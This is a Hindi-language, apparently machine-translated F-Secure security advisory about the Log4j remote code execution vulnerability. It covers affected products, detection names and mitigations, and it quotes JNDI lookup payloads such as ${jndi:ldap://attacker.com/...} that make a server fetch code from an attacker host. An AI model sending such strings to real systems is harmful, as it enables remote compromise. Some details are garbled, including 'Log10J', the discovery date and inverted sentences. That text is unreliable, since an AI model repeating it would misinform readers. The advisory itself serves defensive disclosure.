शुक्रवार 4 दिसंबर को खोजी गई Log10J लाइब्रेरी में एक भेद्यता दुनिया भर के सॉफ्टवेयर निर्माताओं और सेवा प्रदाताओं को हिला रही है। Microsoft के Minecraft से ई-कॉमर्स प्लेटफ़ॉर्म पर सॉफ़्टवेयर में लॉग संदेशों को संसाधित करने के लिए मानकीकृत विधि में भेद्यता पर पहले से ही हमलावरों द्वारा हमला किया जा रहा है।
जोखिम के उस स्तर का वर्णन करना लगभग असंभव है जो वर्तमान में संवेदनशील अनुप्रयोग उत्पन्न करते हैं। यदि भेद्यता पर लक्षित वर्णों की एक उपयोगकर्ता-नियंत्रित स्ट्रिंग लॉग की जाती है, तो भेद्यता को दूरस्थ रूप से निष्पादित किया जा सकता है। सीधे शब्दों में कहें, एक हमलावर इस भेद्यता का उपयोग किसी दूरस्थ स्थान से कोड लाने और निष्पादित करने में लक्ष्य प्रणाली को धोखा देने के लिए कर सकता है। दूसरे चरण में, यह हमलावर पर निर्भर करता है कि दुर्भावनापूर्ण कोड क्या करे।
एक "लगभग पूर्ण तूफान"
यह भेद्यता दर्शाती है कि कॉर्पोरेट सॉफ़्टवेयर को कई स्तरों पर सुरक्षित करना कितना कठिन है। जावा के पुराने संस्करणों सहित आउटडेटेड सॉफ़्टवेयर, कई कंपनियों को अपने स्वयं के पैच विकसित करने या उन्हें तुरंत पैच करने से रोकने के लिए बाध्य करता है। एक और जटिलता वास्तविक समय में Log4j की लॉगिंग क्षमताओं को पैच करने की चुनौती से उत्पन्न होती है, जब हमलों का खतरा इतना अधिक होता है और लॉगिंग बहुत महत्वपूर्ण होती है।
साइबर सुरक्षा और बुनियादी ढांचा सुरक्षा एजेंसी ने एक ब्लॉग पोस्ट में लिखा है कि सभी अनुशंसित उपायों को "तत्काल" लागू किया जाना चाहिए।
उपलब्ध होने पर विभिन्न ऑनलाइन सेवाओं के लिए अद्यतन स्थापित करने के अलावा बहुत से व्यक्तिगत उपयोगकर्ता अन्य नहीं कर सकते हैं। और यह तुरंत होना चाहिए। फर्म और उद्यम अपने स्वयं के सिस्टम को सुरक्षित करते हुए पैच लगाने के लिए बिना रुके काम करेंगे। उसके बाद, यह निर्धारित करना महत्वपूर्ण होगा कि क्या प्रभावित सिस्टम में एक सक्रिय सुरक्षा घटना चल रही है।
भेद्यता लगभग हर जगह है
ऐसा एप्लिकेशन ढूंढना कठिन हो सकता है जो Log4J लाइब्रेरी का उपयोग नहीं करता है जो करता है। इस सर्वव्यापकता का मतलब है कि हमलावर लगभग कहीं भी कमजोरियों की तलाश कर सकते हैं।
"कृपया अपने टेस्ला या आईफोन का नाम बदलें नहीं ${jndi:ldap://url/a} में, जब तक कि आप एक अप्रत्याशित घटना नहीं चाहते हैं,” एर्का कोइवुनेन, एफ-सिक्योर के मुख्य सूचना सुरक्षा अधिकारी कहते हैं, मजाक में.
Log4J की स्वरूपण भाषा का उपयोग करने से कमजोर अनुप्रयोगों में मैलवेयर ट्रिगर हो सकता है। जैसा कि हम जानते हैं, उदाहरण के लिए, माइनक्राफ्ट चैट में ${jndi:ldap://attacker.com/pwnyourserver} जैसे वाक्यांश का उल्लेख, पैच न किए गए सिस्टम पर Microsoft के लिए एक सुरक्षा तूफान को ट्रिगर कर सकता है।
क्या एफ-सिक्योर उत्पाद प्रभावित हैं?
एफ-सिक्योर ने निर्धारित किया है कि निम्नलिखित उत्पाद इस भेद्यता से प्रभावित हैं:
- एफ-सिक्योर पॉलिसी मैनेजर
- एफ-सिक्योर पॉलिसी मैनेजर प्रॉक्सी
- एफ-सिक्योर एंडपॉइंट प्रॉक्सी
- एफ-सिक्योर एलिमेंट्स कनेक्टर
इन उत्पादों के विंडोज और लिनक्स दोनों संस्करण प्रभावित हैं और इन्हें तुरंत पैच किया जाना चाहिए।
मैं अपने एफ-सिक्योर उत्पाद को कैसे पैच कर सकता हूं?
हमने इस भेद्यता के लिए एक सुरक्षा पैच विकसित किया है। इस भेद्यता के बारे में समाचार और अपडेट हमारे समुदाय पेज में लगातार प्रकाशित होते रहते हैं
इस भेद्यता के खिलाफ एफ-सिक्योर क्या सुरक्षा प्रदान करता है?
एफ-सिक्योर एंडपॉइंट प्रोटेक्शन (ईपीपी) को नवीनतम स्थानीय शोषण फाइलों के लिए लगातार अपडेट किया जाता है, लेकिन कई तरह से भेद्यता का फायदा उठाया जा सकता है, यह केवल समस्या का हिस्सा है।
ईपीपी डिटेक्शन, हमेशा की तरह, शोषण के बाद के चरण में देखे गए किसी भी पेलोड से निपटते हैं। इस लेखन के अनुसार, एफ-सिक्योर ने निम्नलिखित पहचान की है जो कुछ गंभीर हमले परिदृश्यों को कवर करती है। ये दुर्भावनापूर्ण पेलोड हैं जिन्हें हमने Log4j शोषण के संबंध में देखा है।
- टीआर/ड्रॉप.कोबासिस.एएल
- टीआर/रोजेना.रदेज
- टीआर/पीएसहेल.एजेंट.एसडब्ल्यूआर
- टीआर/कोबलाट.जी1
- TR/AD.MeterpreterSC.rywng
इनमें से कई पहचान एफ-सिक्योर ईपीपी में महीनों से उपलब्ध हैं, जिसका अर्थ है कि ग्राहक इन पेलोड से सक्रिय रूप से सुरक्षित हैं।
अन्य मौजूदा पहचान भी मददगार हो सकती हैं क्योंकि शोषण का लाभ उठाने के कई तरीके हैं। जैसे ही स्थिति विकसित होगी, उपयोगी खोज की यह सूची लगातार अपडेट की जाएगी। अतिरिक्त उपचारात्मक कार्रवाइयों के लिए निम्न अनुभाग में सामान्य अनुशंसाएँ देखें।
सामान्य तौर पर, निर्माता की परवाह किए बिना आपको किसी भी सॉफ़्टवेयर के साथ क्या कार्रवाई करनी चाहिए?
- नेटवर्क एक्सेस को प्रतिबंधित करें या इसे विश्वसनीय साइटों तक सीमित करें। यदि आपका सिस्टम दुर्भावनापूर्ण कोड प्राप्त करने के लिए इंटरनेट से कनेक्ट नहीं हो पाता है, तो हमला विफल हो जाएगा।
- सुरक्षा कमजोरियों के लिए पैच और अन्य सुधारों के बारे में जानकारी के लिए नियमित रूप से विक्रेताओं से संपर्क करें।
- एफ-सिक्योर एलिमेंट्स भेद्यता प्रबंधन कमजोर प्रणालियों की पहचान करने में मदद कर सकता है।
- एफ-सिक्योर एलिमेंट्स एंडपॉइंट प्रोटेक्शन या एफ-सिक्योर बिजनेस सूट उत्पाद उस सिस्टम पर कमजोर सॉफ्टवेयर का पता लगा सकते हैं और पैच कर सकते हैं जहां वे स्थापित हैं।
एफ-सिक्योर भी सभी ग्राहकों और उपयोगकर्ताओं को हर समय अप टू डेट रखता है।
F-Secure.com पर अधिक
एफ-सिक्योर के बारे में वास्तविक साइबर हमलों के बारे में एफ-सिक्योर से बेहतर जानकारी किसी के पास नहीं है। हम पता लगाने और प्रतिक्रिया के बीच की खाई को पाटते हैं। ऐसा करने के लिए, हम अपने उद्योग के सैकड़ों शीर्ष तकनीकी सलाहकारों की बेजोड़ खतरे की विशेषज्ञता, हमारे पुरस्कार विजेता सॉफ़्टवेयर चलाने वाले लाखों उपकरणों के डेटा और कृत्रिम बुद्धिमत्ता में चल रहे नवाचारों का लाभ उठाते हैं। अग्रणी बैंक, एयरलाइंस और निगम दुनिया के सबसे खतरनाक साइबर खतरों से लड़ने की हमारी प्रतिबद्धता पर भरोसा करते हैं। शीर्ष चैनल भागीदारों और 200+ सेवा प्रदाताओं के हमारे नेटवर्क के साथ, हमारा मिशन हमारे सभी ग्राहकों को उनकी आवश्यकताओं के अनुरूप एंटरप्राइज़-ग्रेड साइबर सुरक्षा प्रदान करना है। 1988 में स्थापित, एफ-सिक्योर NASDAQ OMX हेलसिंकी लिमिटेड में सूचीबद्ध है।